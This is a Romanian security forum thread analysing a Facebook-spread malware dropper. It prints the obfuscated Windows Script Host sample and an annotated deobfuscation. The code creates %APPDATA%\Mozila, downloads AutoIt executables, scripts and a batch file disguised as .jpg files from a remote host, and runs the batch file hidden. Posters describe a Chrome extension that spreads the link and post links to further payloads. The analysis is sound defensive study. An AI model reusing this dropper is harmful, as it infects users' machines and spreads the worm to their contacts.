
Facebook comment JS download


Salut,

Astazi am fost tag-uit intr-un comment; in momentul in care dai click pe notificare, te redirectioneaza catre link.

 

Sursa:

// Obfuscated sample exactly as posted: Windows Script Host JScript (it uses WScript.CreateObject and
// ActiveXObject, so it is not browser JavaScript).
// _0xe519 is a lookup table of \xNN-escaped strings; the code after it refers to COM ProgIDs, method
// names, URLs and file names only by table index, which hides them from a plain-text search.
// NOTE(review): the page hard-wrapped this paste, in one place in the middle of a \xNN escape inside a
// string literal, so the text will not parse as shown. Kept verbatim for reference.
var _0xe519=["\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x68\x74\x74\x70","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x41\x44\x4F\x44\x42\x2E\x53\x74\x72\x65\x61\x6D","\x6F\x70\x65\x6E","\x74\x79\x70\x65","\x77\x72\x69\x74\x65","\x70\x6F\x73\x69\x74\x69\x6F\x6E","\x72\x65\x61\x64","\x73\x61\x76\x65\x54\x6F\x46\x69\x6C\x65","\x63\x6C\x6F\x73\x65","\x47\x45\x54","\x73\x65\x6E\x64","\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74","\x57\x53\x63\x72\x69\x70\x74\x2E\x53\x68\x65\x6C\x6C","\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E","\x25\x41\x50\x50\x44\x41\x54\x41\x25\x5C","\x45\x78\x70\x61\x6E\x64\x45\x6E\x76\x69\x72\x6F\x6E\x6D\x65\x6E\x74\x53\x74\x72\x69\x6E\x67\x73","\x4D\x6F\x7A\x69\x6C\x61","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x41\x75\x74\x6F\x69\x74\x2E\x6A\x70\x67","\x5C\x61\x75\x74\x6F\x69\x74\x2E\x65\x78\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x62\x67\x2E\x6A\x70\x67","\x5C\x62\x67\x2E\x6A\x73","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x65\x6B\x6C\x2E\x6A\x70\x67","\x5C\x65\x6B\x6C\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x66\x2E\x6A\x70\x67","\x5C\x66\x66\x2E\x7A\x69\x70","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x6F\x72\x6
3\x65\x2E\x6A\x70\x67","\x5C\x66\x6F\x72\x63\x65\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x73\x61\x62\x69\x74\x2E\x6A\x70\x67","\x5C\x73\x61\x62\x69\x74\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x70\x67","\x5C\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x73\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x72\x75\x6E\x2E\x6A\x70\x67","\x5C\x72\x75\x6E\x2E\x62\x61\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x75\x70\x2E\x6A\x70\x67","\x5C\x75\x70\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36","\x5C\x70\x69\x6E\x67\x2E\x6A\x73","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36\x32","\x5C\x70\x69\x6E\x67\x32\x2E\x6A\x73",""];(function(_0xc4a4x1){function _0xc4a4x2(_0xc4a4x2,_0xc4a4x3,_0xc4a4x4){if(!_0xc4a4x3||  !_0xc4a4x2){return null};var _0xc4a4x5=WScript.CreateObject(_0xe519[0]);_0xc4a4x5[_0xe519[1]]= function(){if(_0xc4a4x5[_0xe519[2]]=== 4&& _0xc4a4x5[_0xe519[3]]=== 200){xa=  new ActiveXObject(_0xe519[4]);xa[_0xe519[5]]();xa[_0xe519[6]]= 1;xa[_0xe519[7]](_0xc4a4x5.ResponseBody);xa[_0xe519[8]]= _0xc4a4x4;stm2=  new ActiveXObject(_0xe519[4]);stm2[_0xe519[6]]= 
1;stm2[_0xe519[5]]();stm2[_0xe519[7]](xa[_0xe519[9]]());stm2[_0xe519[10]](_0xc4a4x3,2);stm2[_0xe519[11]]();xa[_0xe519[11]]()}};_0xc4a4x5[_0xe519[5]](_0xe519[12],_0xc4a4x2,false);_0xc4a4x5[_0xe519[13]](null)}function _0xc4a4x6(_0xc4a4x7,_0xc4a4x8){{xa=  new ActiveXObject(_0xe519[4]);xa[_0xe519[5]]();xa[_0xe519[6]]= 1;xa.LoadFromFile(_0xc4a4x7);ix=  new ActiveXObject(_0xe519[4]);ix[_0xe519[5]]();ix[_0xe519[6]]= 1;ix.LoadFromFile(_0xc4a4x8);stm2=  new ActiveXObject(_0xe519[4]);stm2[_0xe519[6]]= 1;stm2[_0xe519[5]]();stm2[_0xe519[7]](ix[_0xe519[9]]());stm2[_0xe519[7]](xa[_0xe519[9]]());xa[_0xe519[11]]();ix[_0xe519[11]]();stm2[_0xe519[10]](_0xc4a4x7,2);stm2[_0xe519[11]]()}}fso=  new ActiveXObject(_0xe519[14]);var _0xc4a4x9= new ActiveXObject(_0xe519[15]);_0xc4a4x1=  new ActiveXObject(_0xe519[16]);FileDestr= _0xc4a4x9[_0xe519[18]](_0xe519[17]);mozklasor= FileDestr+ _0xe519[19];if(!fso.FolderExists(mozklasor)){fso.CreateFolder(mozklasor)};_0xc4a4x1.ShellExecute(_0xe519[20]);_0xc4a4x2(_0xe519[21],mozklasor+ _0xe519[22],0);_0xc4a4x2(_0xe519[23],mozklasor+ _0xe519[24],0);_0xc4a4x2(_0xe519[25],mozklasor+ _0xe519[26],0);_0xc4a4x2(_0xe519[27],mozklasor+ _0xe519[28],0);_0xc4a4x2(_0xe519[29],mozklasor+ _0xe519[30],0);_0xc4a4x2(_0xe519[31],mozklasor+ _0xe519[32],0);_0xc4a4x2(_0xe519[33],mozklasor+ _0xe519[34],0);_0xc4a4x2(_0xe519[35],mozklasor+ _0xe519[36],0);_0xc4a4x2(_0xe519[37],mozklasor+ _0xe519[38],0);_0xc4a4x2(_0xe519[39],mozklasor+ _0xe519[40],0);_0xc4a4x2(_0xe519[41],mozklasor+ _0xe519[42],0);_0xc4a4x1.ShellExecute(mozklasor+ _0xe519[36],_0xe519[43],mozklasor,_0xe519[43],0)})(this)

Deobfuscat:

/**
 * Decoded string table of the sample. The script below never spells out a COM ProgID, method name,
 * URL or file name; it indexes into this array instead.
 *
 * Index map (read off the literal below):
 *   0        "Msxml2.XMLhttp" (HTTP client ProgID)
 *   1-3      XHR member names: onreadystatechange, readyState, status
 *   4        "ADODB.Stream" (binary stream ProgID)
 *   5-11     member names: open, type, write, position, read, saveToFile, close
 *   12-13    "GET", "send"
 *   14-16    ProgIDs: Scripting.FileSystemObject, WScript.Shell, Shell.Application
 *   17-19    "%APPDATA%\", "ExpandEnvironmentStrings", "Mozila" (working folder name)
 *   20       URL opened in the default handler at start
 *   21-42    eleven pairs: remote URL, then the local file name it is saved under
 *   43       empty string
 *
 * Analyst note: nine of the URLs end in ".jpg" while the local names end in
 * .exe / .js / .au3 / .zip / .json / .bat; the remaining two pairs save a pingjs response as .js.
 *
 * @type {Array}
 */
var _0xe519 = ["Msxml2.XMLhttp", "onreadystatechange", "readyState", "status", "ADODB.Stream", "open", "type", "write", "position", "read", "saveToFile", "close", "GET", "send", "Scripting.FileSystemObject", "WScript.Shell", "Shell.Application", "%APPDATA%\\", "ExpandEnvironmentStrings", "Mozila", "https://www.google.com", "http://userexperiencestatics.net/ext/Autoit.jpg", "\\autoit.exe", "http://userexperiencestatics.net/ext/bg.jpg", "\\bg.js", "http://userexperiencestatics.net/ext/ekl.jpg", "\\ekl.au3", 
"http://userexperiencestatics.net/ext/ff.jpg", "\\ff.zip", "http://userexperiencestatics.net/ext/force.jpg", "\\force.au3", "http://userexperiencestatics.net/ext/sabit.jpg", "\\sabit.au3", "http://userexperiencestatics.net/ext/manifest.jpg", "\\manifest.json", "http://userexperiencestatics.net/ext/run.jpg", "\\run.bat", "http://userexperiencestatics.net/ext/up.jpg", "\\up.au3", "http://whos.amung.us/pingjs/?k=pingjse346", "\\ping.js", "http://whos.amung.us/pingjs/?k=pingjse3462", "\\ping2.js", ""];
// Windows Script Host JScript: relies on WScript.CreateObject / ActiveXObject, so it runs under
// wscript/cscript, not in a browser. The identifiers tryIt, readFile, dataAndEvents and
// mayParseLabeledStatementInstead look auto-generated by the deobfuscation tool and do not describe
// what the code does - read the behaviour from the calls, not from the names.
(function(dataAndEvents) {
  /**
   * Downloads one URL and writes the response body to a local file.
   *
   * @param {?} f Remote URL to fetch with GET.
   * @param {?} o Local path the response body is saved to (overwritten if present).
   * @param {number} mayParseLabeledStatementInstead Stream position to read from; every call in
   *     this listing passes 0, i.e. the whole body is copied.
   * @return {?} null when either the URL or the path is missing; otherwise nothing.
   */
  function tryIt(f, o, mayParseLabeledStatementInstead) {
    if (!o || !f) {
      return null;
    }
    // _0xe519[0] === "Msxml2.XMLhttp"
    var xhr = WScript.CreateObject(_0xe519[0]);
    /**
     * onreadystatechange handler: acts only on a completed request (readyState 4) with HTTP 200.
     * Any other status is ignored silently, so a failed download leaves no file and raises no error.
     * @return {undefined}
     */
    xhr[_0xe519[1]] = function() {
      if (xhr[_0xe519[2]] === 4 && xhr[_0xe519[3]] === 200) {
        // xa and stm2 are assigned without var, so they become implicit globals.
        xa = new ActiveXObject(_0xe519[4]);
        xa[_0xe519[5]]();
        /** ADODB.Stream Type 1 = binary. @type {number} */
        xa[_0xe519[6]] = 1;
        xa[_0xe519[7]](xhr.ResponseBody);
        /** Rewind (or seek) to the caller-supplied offset before reading back. @type {number} */
        xa[_0xe519[8]] = mayParseLabeledStatementInstead;
        stm2 = new ActiveXObject(_0xe519[4]);
        /** Binary again for the output stream. @type {number} */
        stm2[_0xe519[6]] = 1;
        stm2[_0xe519[5]]();
        stm2[_0xe519[7]](xa[_0xe519[9]]());
        // saveToFile option 2 = create the file or overwrite an existing one.
        stm2[_0xe519[10]](o, 2);
        stm2[_0xe519[11]]();
        xa[_0xe519[11]]();
      }
    };
    // open("GET", url, false): third argument false makes the request synchronous.
    xhr[_0xe519[5]](_0xe519[12], f, false);
    xhr[_0xe519[13]](null);
  }
  /**
   * Rewrites `filename` in place as the bytes of `path` followed by the original bytes of
   * `filename` (i.e. prepends one file to another). Not called anywhere in this listing.
   *
   * @param {?} filename File that is read and then overwritten with the combined content.
   * @param {?} path File whose content is written first.
   * @return {undefined}
   */
  function readFile(filename, path) {
    xa = new ActiveXObject(_0xe519[4]);
    xa[_0xe519[5]]();
    /** ADODB.Stream Type 1 = binary. @type {number} */
    xa[_0xe519[6]] = 1;
    xa.LoadFromFile(filename);
    ix = new ActiveXObject(_0xe519[4]);
    ix[_0xe519[5]]();
    /** @type {number} */
    ix[_0xe519[6]] = 1;
    ix.LoadFromFile(path);
    stm2 = new ActiveXObject(_0xe519[4]);
    /** @type {number} */
    stm2[_0xe519[6]] = 1;
    stm2[_0xe519[5]]();
    // Order matters: `path` content first, then the original `filename` content.
    stm2[_0xe519[7]](ix[_0xe519[9]]());
    stm2[_0xe519[7]](xa[_0xe519[9]]());
    xa[_0xe519[11]]();
    ix[_0xe519[11]]();
    stm2[_0xe519[10]](filename, 2);
    stm2[_0xe519[11]]();
  }
  // fso, FileDestr and mozklasor are implicit globals (no var).
  fso = new ActiveXObject(_0xe519[14]);            // Scripting.FileSystemObject
  var fo = new ActiveXObject(_0xe519[15]);         // WScript.Shell
  dataAndEvents = new ActiveXObject(_0xe519[16]);  // Shell.Application; the `this` argument is discarded
  // ExpandEnvironmentStrings("%APPDATA%\\") -> the current user's roaming AppData path.
  FileDestr = fo[_0xe519[18]](_0xe519[17]);
  // Working folder: %APPDATA%\Mozila (spelled with one "l" in the sample).
  mozklasor = FileDestr + _0xe519[19];
  if (!fso.FolderExists(mozklasor)) {
    fso.CreateFolder(mozklasor);
  }
  // Opens https://www.google.com via the shell. NOTE(review): presumably a decoy so the user sees
  // an ordinary page - the code itself does not establish the purpose.
  dataAndEvents.ShellExecute(_0xe519[20]);
  // Eleven sequential downloads into the working folder (URL -> saved name):
  tryIt(_0xe519[21], mozklasor + _0xe519[22], 0);  // .../ext/Autoit.jpg   -> \autoit.exe
  tryIt(_0xe519[23], mozklasor + _0xe519[24], 0);  // .../ext/bg.jpg       -> \bg.js
  tryIt(_0xe519[25], mozklasor + _0xe519[26], 0);  // .../ext/ekl.jpg      -> \ekl.au3
  tryIt(_0xe519[27], mozklasor + _0xe519[28], 0);  // .../ext/ff.jpg       -> \ff.zip
  tryIt(_0xe519[29], mozklasor + _0xe519[30], 0);  // .../ext/force.jpg    -> \force.au3
  tryIt(_0xe519[31], mozklasor + _0xe519[32], 0);  // .../ext/sabit.jpg    -> \sabit.au3
  tryIt(_0xe519[33], mozklasor + _0xe519[34], 0);  // .../ext/manifest.jpg -> \manifest.json
  tryIt(_0xe519[35], mozklasor + _0xe519[36], 0);  // .../ext/run.jpg      -> \run.bat
  tryIt(_0xe519[37], mozklasor + _0xe519[38], 0);  // .../ext/up.jpg       -> \up.au3
  // NOTE(review): the two pingjs requests look like hit counting / infection tracking - confirm.
  tryIt(_0xe519[39], mozklasor + _0xe519[40], 0);  // whos.amung.us pingjs -> \ping.js
  tryIt(_0xe519[41], mozklasor + _0xe519[42], 0);  // whos.amung.us pingjs -> \ping2.js
  // Launches the downloaded run.bat with the working folder as its directory; the final argument 0
  // asks for a hidden window. What run.bat does is not shown in this listing.
  // Detection hints grounded in the lines above: a script host process issuing HTTP GETs for .jpg
  // URLs, files appearing under %APPDATA%\Mozila with executable/script extensions, and a hidden
  // batch file started from that folder.
  dataAndEvents.ShellExecute(mozklasor + _0xe519[36], _0xe519[43], mozklasor, _0xe519[43], 0);
})(this);

Nu imi dau seama ce face, dar pare interesant.


L-am instalat pe o masina virtuala :))) Pare sa fie targetat pentru Chrome.

 

image.png

 

Baga in %appdata% un folder Mozila, in care is niste script-uri autoit impreuna cu compilatorul autoit. Iti instaleaza o extensie in chrome, folosita sa trimita si la alte persoane acel link; acesta e script-ul folosit pe facebook:

http://pastebin.com/9UDBCg0c

 

Script-ul extensiei chrome:

http://pastebin.com/mF0LtMZK

Daca te duci pe chrome://extensions o sa te redirectioneze:)))

 

 

In final, nu stiu care este scopul lui si de ce se raspandeste.

 

https://www.sendspace.com/file/88v34k

 

 

http://appcdn.co/data.js?r - daca intri de pe chrome, o sa te redirectioneze catre diferite domenii unde e tinut script-ul pentru facebook; daca intri de pe firefox, o sa iti dea jquery.

Edited by danyweb09